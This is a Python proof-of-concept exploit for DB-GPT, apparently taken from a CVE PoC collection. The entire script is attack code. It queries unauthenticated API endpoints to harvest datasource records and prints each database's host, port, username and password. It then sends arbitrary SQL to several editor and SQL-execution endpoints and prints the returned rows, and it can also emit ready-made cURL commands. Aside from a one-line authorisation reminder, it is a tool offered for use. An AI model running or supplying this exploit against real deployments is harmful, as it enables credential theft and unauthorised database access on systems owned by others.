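# NOTE: the following lines are web-page residue captured with the file; kept as comments.
# 5465 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / dbgpt_poc.py PY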
import requests
import json
import urllib3
import argparse
import sys

# Silence urllib3's InsecureRequestWarning: every HTTP call in this script is
# made with verify=False (TLS certificate checks disabled), which would
# otherwise trigger that warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def banner():
    """Print the ASCII-art banner and the one-line tool description to stdout."""
    # Raw string so the backslashes in the art are emitted literally.
    art = r"""
    ____  ____  ________  ____  ______   ____  ____  ______
   / __ \/ __ )/ ____/  |/  / |/ /  _/  / __ \/ __ \/ ____/
  / / / / __  / / __/ /|_/ / /|_/ // /   / /_/ / / / / /     
 / /_/ / /_/ / /_/ / /  / / /  / // /   / ____/ /_/ / /___   
/_____/_____/\____/_/  /_/_/  /_/___/  /_/    \____/\____/   
                                                             
    [+] DBGPT Unauthenticated Information Disclosure & SQL Execution PoC
    """
    print(art)

# Version-probe query per database family.
# get_smart_sql() matches each key as a *substring* of the lower-cased
# datasource type, walking the dict in insertion order, so the first key that
# occurs in the type string wins.
DB_QUERIES = {
    "mysql": "SELECT VERSION();",
    "postgresql": "SELECT version();",
    "postgres": "SELECT version();",
    "sqlite": "SELECT sqlite_version();",
    "oracle": "SELECT banner FROM v$version WHERE ROWNUM = 1;",
    "mssql": "SELECT @@VERSION;",
    "sqlserver": "SELECT @@VERSION;",
    "dm": "SELECT * FROM v$version;",  # Dameng DB
    "kingbase": "SELECT version();",   # Kingbase
}

def get_smart_sql(db_type, default_sql):
    """
    Pick a version query suited to ``db_type`` when ``default_sql`` is the stock probe.

    Args:
        db_type: Datasource type string (e.g. "mysql", "PostgreSQL"). Falsy
            values mean "unknown" and leave the query untouched.
        default_sql: The query the caller intends to run.

    Returns:
        The matching entry from ``DB_QUERIES`` if ``default_sql`` is exactly the
        generic ``SELECT VERSION()`` probe (ignoring case, surrounding
        whitespace and trailing semicolons) and a key of ``DB_QUERIES`` occurs
        in ``db_type``; otherwise ``default_sql`` unchanged.
    """
    if not db_type:
        return default_sql

    # Adapt only the stock probe. A substring test here would also rewrite
    # custom queries that merely contain "select version()", discarding what
    # the user actually asked for.
    normalized = default_sql.strip().rstrip(";").strip().lower()
    if normalized != "select version()":
        return default_sql

    # str() guards against a non-string type value coming from decoded JSON.
    type_name = str(db_type).lower()
    for key, query in DB_QUERIES.items():
        if key in type_name:
            return query

    return default_sql

def _extract_db_info(db):
    """Flatten one datasource record into the common dict layout used by this script."""
    if "params" in db:
        # Nested layout: connection settings live under the "params" key.
        params = db.get("params", {})
        return {
            "id": db.get("id"),
            "type": db.get("type"),
            "name": params.get("database") or db.get("db_name"),
            "user": params.get("user"),
            "password": params.get("password"),
            "host": params.get("host"),
            "port": params.get("port"),
            "driver": params.get("driver"),
        }

    # Flat layout (alternative format, e.g. /api/v1/chat/db/list): db_* keys
    # sit directly on the record. Pairs are (output field, source key).
    flat_fields = (
        ("id", "id"),
        ("type", "db_type"),
        ("name", "db_name"),
        ("user", "db_user"),
        ("password", "db_pwd"),
        ("host", "db_host"),
        ("port", "db_port"),
        ("driver", "db_type"),
    )
    return {field: db.get(source) for field, source in flat_fields}

def get_datasources(base_url):
    """
    Query the known datasource-listing endpoints and collect what they return.

    Each endpoint is requested with GET (TLS verification off, 10 s timeout).
    The function returns as soon as one endpoint answers HTTP 200 with JSON
    whose "success" is true and whose "data" list is non-empty.

    Args:
        base_url: Base URL of the target; a trailing "/" is stripped.

    Returns:
        A list of dicts with the keys id, type, name, user, password, host,
        port and driver. The list is empty when no endpoint yielded records.
    """
    candidate_paths = (
        "/api/v2/serve/datasources",
        "/api/v1/chat/db/list",
        "/api/v1/editor/db/list",  # Sometimes this exists too
    )

    collected = []

    for endpoint in candidate_paths:
        target_url = base_url.rstrip("/") + endpoint
        print(f"[*] Trying to fetch datasources from: {target_url}")

        try:
            response = requests.get(target_url, verify=False, timeout=10)

            if response.status_code != 200:
                print(f"[-] Endpoint {endpoint} returned status code: {response.status_code}")
                continue

            try:
                data = response.json()
            except json.JSONDecodeError:
                print(f"[-] Endpoint {endpoint} did not return valid JSON.")
                continue

            if data.get("success") is not True:
                print(f"[-] Endpoint {endpoint} returned success=false.")
                continue

            db_list = data.get("data", [])
            if not db_list:
                print(f"[-] Endpoint {endpoint} returned success but no data.")
                continue

            print(f"[+] SUCCESS! Found {len(db_list)} database configurations at {endpoint}")
            # Append one by one so records gathered before a malformed entry
            # are kept if the except clause below fires.
            for db in db_list:
                collected.append(_extract_db_info(db))

            # First working endpoint wins; do not query the remaining ones.
            return collected

        except Exception as e:
            # Catch-all: covers request failures and unexpected response shapes.
            print(f"[!] Error connecting to {target_url}: {e}")

    return collected

def run_sql(base_url, db_name, sql_query, generate_curl=False):
    """
    Submit ``sql_query`` for ``db_name`` to the SQL-execution endpoints, or print a cURL command.

    Args:
        base_url: Base URL of the target; a trailing "/" is stripped.
        db_name: Name of the datasource the query is addressed to.
        sql_query: SQL text to send.
        generate_curl: When true, send nothing. Only print an equivalent cURL
            command for the first endpoint and return True.

    Returns:
        True if a cURL command was printed or an endpoint reported success
        (columns and rows are printed); False if every endpoint/payload
        combination failed.
    """
    # Chart-style request body; reused for the cURL output and the first attempt.
    chart_payload = {
        "db_name": db_name,
        "chart_type": "bar",
        "sql": sql_query,
    }

    if generate_curl:
        target_url = base_url.rstrip("/") + "/api/v1/editor/chart/run"
        json_payload = json.dumps(chart_payload)

        print("\n[+] Generated cURL command:")
        print(f'curl -X POST "{target_url}" -H "Content-Type: application/json" -d \'{json_payload}\'')
        return True

    endpoints = (
        "/api/v1/editor/chart/run",  # Standard endpoint
        "/api/v1/sql/exec",          # Alternative
        "/api/v1/editor/db/run",     # Another possibility
        "/api/v2/serve/query",       # v2 API attempt
    )

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
    }

    # Body variants tried in order against each endpoint. They do not depend
    # on the endpoint, so they are built once.
    payloads = (
        chart_payload,
        # Same body plus dummy chart info (sometimes required)
        {**chart_payload, "chart_name": "test_chart", "chart_desc": "test_desc"},
        # Simplified body for raw SQL execution endpoints
        {"db_name": db_name, "sql": sql_query},
    )
    final_attempt = len(payloads) - 1

    print(f"\n[*] Executing SQL on database '{db_name}': {sql_query}")

    for endpoint in endpoints:
        target_url = base_url.rstrip("/") + endpoint

        for attempt, payload in enumerate(payloads):
            try:
                response = requests.post(target_url, json=payload, headers=headers, verify=False, timeout=15)

                if response.status_code != 200:
                    # 404 (endpoint absent) or any other status: try the next one.
                    continue

                try:
                    data = response.json()
                except json.JSONDecodeError:
                    # Stay quiet; the summary after the loops reports total failure.
                    continue

                if data.get("success") is not True:
                    err_msg = data.get('err_msg', '')
                    if "unexpected keyword argument 'params'" in err_msg:
                        print(f"[-] Server Error at {endpoint}: Backend code bug (unexpected 'params'). This is common in some DBGPT versions with PostgreSQL.")
                    elif attempt == final_attempt:
                        # Report ordinary failures once per endpoint, on the last body variant.
                        print(f"[-] SQL Execution Failed at {endpoint}. Message: {err_msg}")
                    continue

                # The result is either directly under "data" or under "data.sql_data".
                sql_data = data.get("data", {})
                if "sql_data" in sql_data:
                    sql_data = sql_data.get("sql_data", {})

                # "colunms" is the misspelled key the API response uses; fall back to "columns".
                columns = sql_data.get("colunms", []) or sql_data.get("columns", [])
                values = sql_data.get("values", [])

                print(f"[+] SQL Execution Successful! (Endpoint: {endpoint})")
                if columns:
                    print(f"    Columns: {columns}")
                if values:
                    print("    Results:")
                    for row in values:
                        print(f"    {row}")
                else:
                    print("    (No rows returned)")
                return True

            except Exception:
                # Network errors or unexpected response shapes: move on silently.
                continue

    print("[-] All SQL execution attempts failed.")
    return False

def main():
    """
    Command-line entry point: list datasources, then run a query against them.

    Phase 1 calls ``get_datasources`` on ``--url`` and prints every record it
    returned. Phase 2 calls ``run_sql`` once per target: the ``--db`` name if
    given, otherwise every discovered datasource. The query is ``--sql``,
    passed through ``get_smart_sql`` so the default version probe can be
    adapted to the datasource type. With ``--curl``, ``run_sql`` prints a cURL
    command instead of sending the query.

    NOTE: run only against systems you are authorized to test.
    """
    banner()

    examples = """
    Examples:
        # Basic check for DB info and version
        python dbgpt_poc.py -u https://dbgpt.example.com

        # Execute custom SQL
        python dbgpt_poc.py -u https://dbgpt.example.com --sql "SELECT user();"

        # Specify a database name if auto-detection fails
        python dbgpt_poc.py -u https://dbgpt.example.com --db "target_db" --sql "SHOW TABLES;"
    """

    parser = argparse.ArgumentParser(
        description="DBGPT Vulnerability PoC",
        epilog=examples,
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://dbgpt.example.com)")
    parser.add_argument("-s", "--sql", default="SELECT VERSION();", help="SQL query to execute (default: SELECT VERSION())")
    parser.add_argument("--db", help="Specific database name to use for SQL execution (optional, otherwise uses discovered DBs)")
    parser.add_argument("--curl", action="store_true", help="Generate cURL command instead of executing SQL")

    args = parser.parse_args()

    # 1. Get Datasources / Leak Info
    print("--- [ Phase 1: Information Disclosure ] ---")
    dbs = get_datasources(args.url)

    if dbs:
        print(f"\n[+] Found {len(dbs)} Database Configurations:")
        for index, db in enumerate(dbs, start=1):
            print(f"\n    [{index}] Database ID: {db['id']}")
            print(f"        Name     : {db['name']}")
            print(f"        Type     : {db['type']}")
            print(f"        Host     : {db['host']}")
            print(f"        Port     : {db['port']}")
            print(f"        User     : {db['user']}")
            print(f"        Password : {db['password']}") # Leaked credential
    else:
        print("[-] No datasources found. Authentication might be required or endpoints patched.")

    # 2. SQL Execution
    print("\n--- [ Phase 2: SQL Execution ] ---")

    if args.db:
        # A user-provided name takes priority; its type is not known here.
        print(f"[*] Using manually specified database: {args.db}")
        targets = [{"name": args.db, "type": "unknown"}]
    elif dbs:
        # Keep the full records (not just names) so each target's type is available.
        print("[*] Using discovered databases for SQL execution...")
        targets = dbs
    else:
        print("[-] No database targets available for SQL execution.")
        print("    Tips: Use --db <name> to manually specify a target if Information Disclosure failed.")
        return

    for target in targets:
        db_name = target['name']
        db_type = target.get('type')

        if not db_name:
            # Discovered records may lack a name; nothing to address the query to.
            print(f"[-] Skipping target with empty name (ID: {target.get('id')})")
            continue

        # Let get_smart_sql decide whether the query should be adapted to the DB type.
        sql_to_run = get_smart_sql(db_type, args.sql)

        if not args.curl:
            print(f"\n[+] Target: {db_name} (Type: {db_type})")
            if sql_to_run != args.sql:
                print(f"    -> Adapted SQL for {db_type}: {sql_to_run}")

        run_sql(args.url, db_name, sql_to_run, generate_curl=args.curl)

# Run the CLI only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()